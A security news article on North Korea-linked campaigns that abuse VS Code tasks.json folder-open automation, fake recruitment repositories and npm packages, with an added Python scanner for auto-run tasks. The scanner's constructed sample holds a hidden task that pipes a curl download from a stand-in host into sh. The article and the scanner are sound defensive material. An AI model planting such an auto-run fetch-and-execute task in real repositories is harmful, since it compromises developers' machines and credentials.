North Korean Hackers Weaponize Developer Tools to Turn Code Workflows Into Malware Delivery Channels
North Korea-aligned threat actors are shifting from traditional phishing to developer-focused attacks, using GitHub repositories, VS Code project configuration, and fake coding tasks to compromise organizations worldwide.

Cyber attackers are increasingly targeting the tools developers trust. A recent wave of campaigns linked to North Korea-aligned threat actors shows how software development environments can become powerful malware delivery channels.
Security researchers identified malicious campaigns connected to the threat cluster known as Contagious Interview, also tracked under names including Famous Chollima, HexagonalRodent, and Void Dokkaebi. The campaigns focus on developers through fake recruitment messages, code review requests, and technical assignments designed to appear legitimate.
The attack begins with carefully crafted phishing emails that direct victims to attacker-controlled GitHub repositories, which typically contain fake coding projects or cryptocurrency-related tasks. When a developer clones the repository and opens it in Microsoft Visual Studio Code or a VS Code fork such as Cursor, workspace automation features built into the editor execute attacker-supplied commands, with no need for the victim to launch anything by hand.
The principal technique is a VS Code task defined in the repository's .vscode/tasks.json and configured to run when the folder opens (runOptions.runOn set to folderOpen). Because the task starts as a side effect of opening the project, the attacker never has to persuade the user to run a suspicious file. VS Code's Workspace Trust feature is the built-in control here: in Restricted Mode tasks are not executed automatically, so the technique depends on the developer trusting the folder, which many do reflexively when prompted.
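As an added example (this is not code from the original article or from the researchers it cites), the following Python script implements the check a developer would want before trusting a freshly cloned folder: it walks the repository, parses every .vscode/tasks.json it finds (VS Code accepts JSON with comments and trailing commas, so plain json.loads is not enough), and reports each task that would start on folder open, together with the command it would run and whether the task is configured to keep its terminal hidden. The sample tasks.json, its "setup" task, and the host example.invalid are constructed for this example and are not taken from any real campaign artifact.

```python
import json
import os
import re
import tempfile
from typing import Dict, List


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments, but leave comment-like text inside strings
    alone (a command such as "curl https://host/x.sh | sh" must survive)."""
    out: List[str] = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # copy escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            in_str = c != '"'
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j            # the newline itself is kept
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def load_jsonc(text: str) -> dict:
    """Parse VS Code style JSON-with-comments. Trailing commas are dropped with a
    regex, which is fine for tasks.json but would mangle a string containing ',}'."""
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", strip_jsonc(text)))


def find_auto_run_tasks(tasks_json: dict) -> List[Dict[str, object]]:
    """Return the tasks VS Code would start automatically on folder open."""
    hits = []
    for task in tasks_json.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        parts = [str(task.get("command", ""))]
        if isinstance(task.get("args"), list):
            parts += [str(a) for a in task["args"]]
        reveal = (task.get("presentation") or {}).get("reveal", "always")
        hits.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type", "process"),
            "command": " ".join(p for p in parts if p),
            "hidden": reveal == "never",   # terminal is never shown to the user
        })
    return hits


def scan_repo(root: str) -> List[Dict[str, object]]:
    """Scan every .vscode/tasks.json below root (nested folders included, since
    any of them could be opened as a workspace) and return the findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if os.path.basename(dirpath) != ".vscode" or "tasks.json" not in filenames:
            continue
        path = os.path.join(dirpath, "tasks.json")
        with open(path, encoding="utf-8-sig") as fh:   # tolerate a UTF-8 BOM
            try:
                data = load_jsonc(fh.read())
            except json.JSONDecodeError as exc:
                findings.append({"file": path, "error": str(exc)})
                continue
        findings += [dict(hit, file=path) for hit in find_auto_run_tasks(data)]
    return findings


# Constructed sample for this example (hypothetical command and host).
SAMPLE_TASKS_JSON = r'''{
  // an ordinary build task a reviewer would expect to see
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "setup",               /* benign-looking name */
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false },
    }
  ]
}'''


def demo() -> List[Dict[str, object]]:
    """Write the sample into a throwaway repository layout and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, ".vscode"))
        with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_TASKS_JSON)
        return scan_repo(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a clone before opening the folder in the editor; any finding with "hidden": True deserves particular suspicion, since a legitimate setup task rarely needs to suppress its own terminal. The script only covers tasks.json, so it complements rather than replaces Workspace Trust, which blocks automatic task execution in Restricted Mode regardless of what the file contains.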
The campaigns, tracked as UNK_DeadDrop, targeted organizations across finance, cryptocurrency, education, and technology sectors. Researchers observed hundreds of phishing emails sent to employees at nearly 100 organizations, with a significant number of targets located in the United States and other major technology markets.
Additionally, attackers have expanded their methods beyond traditional malware delivery. They are now abusing developer ecosystems, open-source repositories, package managers, and code collaboration platforms to reach technical users.
The malware used in these attacks can operate across Windows, macOS, and Linux environments. Once installed, it can steal browser credentials, cryptocurrency wallet information, sensitive files, and authentication data. Attackers also use these tools for system discovery and remote command execution.
A key concern is the targeting of cryptocurrency developers and financial technology professionals. Developer machines routinely hold API keys, cloud credentials, private repositories, and wallet access information, so a single compromised workstation can expose an organization's cloud accounts and source code rather than just one endpoint.
Researchers also discovered malicious VS Code extensions disguised as productivity tools. These extensions used trusted developer platforms as a disguise while providing attackers with capabilities for data theft, command execution, and remote access.
Meanwhile, other campaigns have used malicious npm packages and GitHub repositories to spread information stealers and remote access tools. This demonstrates a broader trend: attackers are treating software supply chains and developer workflows as direct attack surfaces.
For security leaders and CISOs, this evolution highlights the need to expand protection beyond traditional endpoint security. Organizations must also secure developer environments, monitor software supply chain risks, and establish controls around third-party code usage.
Developers should verify a repository's provenance before cloning it, avoid executing unknown code, review project configuration files (.vscode/tasks.json, .vscode/settings.json, and the scripts section of package.json) before opening or installing a project, keep VS Code's Workspace Trust enabled and decline to trust folders from unverified sources, and use security tooling that flags suspicious extensions and auto-run behavior.
Protecting the organization will increasingly mean protecting not only users and applications but the entire development lifecycle. As attackers keep adapting, secure development practices and developer awareness will be critical defenses against these campaigns.